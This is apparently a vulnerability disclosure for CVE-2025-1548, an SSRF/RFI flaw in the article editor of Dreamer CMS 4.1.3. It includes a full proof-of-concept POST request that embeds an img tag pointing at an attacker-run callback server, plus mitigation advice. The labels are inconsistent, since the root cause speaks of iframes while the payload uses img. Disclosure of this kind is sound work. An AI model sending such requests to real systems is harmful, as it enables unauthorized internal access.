Skip to content

RemoteFileInclusion-ArticleEditorImageUpload.md

Latest commit

 

History

History
141 lines (98 loc) · 5.17 KB

RemoteFileInclusion-ArticleEditorImageUpload.md

File metadata and controls

141 lines (98 loc) · 5.17 KB

CVE-2025-1548 - Remote File Inclusion (RFI) Vulnerability In Article Editor Image Upload Functionality of Dreamer CMS 4.1.3

Description:

A Remote File Inclusion (RFI) vulnerability exists in the image upload functionality in the article editor (编辑文章) of Dreamer CMS 4.1.3. This vulnerability arises because the application allows users to embed imgs with arbitrary remote src values using the article editor (编辑文章). An attacker can exploit this functionality to force the server to make unauthorized requests to external targets, potentially exposing sensitive information or enabling further attacks.

Affected Component:

  • Endpoint: POST /admin/archives/edit
  • Application Version: 4.1.3

Type of Vulnerability:

CWE-918: Server-Side Request Forgery (SSRF)

Impact:

  • Unauthorized Internal Access: Attackers can access internal services or network-restricted endpoints through SSRF.

Steps to Reproduce / PoC:

  1. Start a python web server on attacker machine, accessible at: http://127.0.0.1:4444
    python3 -m http.server 4444
  1. After authentication to the backend, make a POST request with Burp, containing an img with an src loading from an arbitrary URL.
    POST /admin/archives/edit HTTP/1.1
    Host: localhost:8888
    Content-Length: 1756
    Pragma: no-cache
    Cache-Control: no-cache
    sec-ch-ua: "Not A(Brand";v="8", "Chromium";v="132"
    sec-ch-ua-mobile: ?0
    sec-ch-ua-platform: "Linux"
    Accept-Language: en-US,en;q=0.9
    Origin: http://localhost:8888
    Content-Type: multipart/form-data; boundary=----WebKitFormBoundary0xgAcparCLsGBBEz
    Upgrade-Insecure-Requests: 1
    User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
    Sec-Fetch-Site: same-origin
    Sec-Fetch-Mode: navigate
    Sec-Fetch-User: ?1
    Sec-Fetch-Dest: iframe
    Referer: http://localhost:8888/admin/archives/toEdit?id=07d10ba665644d40ba558b0fe3d4831f&cid=2512e4593b514db2a10841cbc8a63a23
    Accept-Encoding: gzip, deflate, br
    Cookie: Hm_lvt_cd8218cd51f800ed2b73e5751cb3f4f9=1737869223; studentUserName=student; adminUserName=admin; dreamer-cms-s=6fdd504a-59e3-4a6b-9808-aabe821b1e76
    Connection: keep-alive

    ------WebKitFormBoundary0xgAcparCLsGBBEz
    Content-Disposition: form-data; name="id"

    07d10ba665644d40ba558b0fe3d4831f
    ------WebKitFormBoundary0xgAcparCLsGBBEz
    Content-Disposition: form-data; name="fid"

    b978ae1d04754e2686397489391cbb53
    ------WebKitFormBoundary0xgAcparCLsGBBEz
    Content-Disposition: form-data; name="categoryId"

    2512e4593b514db2a10841cbc8a63a23
    ------WebKitFormBoundary0xgAcparCLsGBBEz
    Content-Disposition: form-data; name="categoryIds"

    .4ol61bbh.mvpeun1s
    ------WebKitFormBoundary0xgAcparCLsGBBEz
    Content-Disposition: form-data; name="imagePath"


    ------WebKitFormBoundary0xgAcparCLsGBBEz
    Content-Disposition: form-data; name="answer"

    <p><img src="http://127.0.0.1:4444/"/></p>
    ------WebKitFormBoundary0xgAcparCLsGBBEz
    Content-Disposition: form-data; name="title"

    梦想家项目如何在本地搭建环境?
    ------WebKitFormBoundary0xgAcparCLsGBBEz
    Content-Disposition: form-data; name="weight"

    0
    ------WebKitFormBoundary0xgAcparCLsGBBEz
    Content-Disposition: form-data; name="clicks"

    9
    ------WebKitFormBoundary0xgAcparCLsGBBEz
    Content-Disposition: form-data; name="file"; filename=""
    Content-Type: application/octet-stream


    ------WebKitFormBoundary0xgAcparCLsGBBEz
    Content-Disposition: form-data; name="description"


    ------WebKitFormBoundary0xgAcparCLsGBBEz
    Content-Disposition: form-data; name="comment"

    1
    ------WebKitFormBoundary0xgAcparCLsGBBEz
    Content-Disposition: form-data; name="subscribe"

    1
    ------WebKitFormBoundary0xgAcparCLsGBBEz
    Content-Disposition: form-data; name="status"

    1
    ------WebKitFormBoundary0xgAcparCLsGBBEz
    Content-Disposition: form-data; name="editorValue"

    <p><img src="http://127.0.0.1:4444/"/></p>
    ------WebKitFormBoundary0xgAcparCLsGBBEz--
  1. Observe a request sent to our attacker controlled python web server when the admin revisits the same article editor via the frontend.
    127.0.0.1 - - [xx/xxx/xxxx xx:xx:xx] "GET / HTTP/1.1" 200 -

Root Cause:

The application does not validate or sanitize user-provided URLs for the Iframe embedding URL specification. This lack of restriction allows attackers to supply arbitrary URLs, leading to SSRF.

Mitigation Recommendations:

  1. Input Validation:

    • Restrict the allowed URLs to trusted domains using a whitelist.

  2. Network Restrictions:

    • Configure the backend to restrict outbound requests to necessary domains and block access to internal/private IP ranges.

References: